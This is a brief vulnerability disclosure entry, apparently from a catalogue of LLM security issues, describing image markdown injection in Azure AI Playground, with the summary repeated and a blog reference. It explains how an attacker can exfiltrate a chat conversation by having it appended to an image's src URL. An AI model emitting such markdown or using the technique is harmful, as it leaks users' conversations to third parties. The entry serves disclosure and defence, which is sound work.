Image Markdown Injection in Azure AI Playground. An attacker can exfiltrate the current chat conversation by appending it to the src attribute which is the URL where the image is loaded from. There were no integrations available (yet), that could pull remote content into the chat prompt, limiting the impact of this vulnerability.
Summary (give a brief description of the issue)
Image Markdown Injection in Azure AI Playground. An attacker can exfiltrate the current chat conversation by appending it to the src attribute which is the URL where the image is loaded from. There were no integrations available (yet), that could pull remote content into the chat prompt, limiting the impact of this vulnerability.
References (provide links to blogposts, etc.)
https://embracethered.com/blog/posts/2023/data-exfiltration-in-azure-openai-playground-fixed/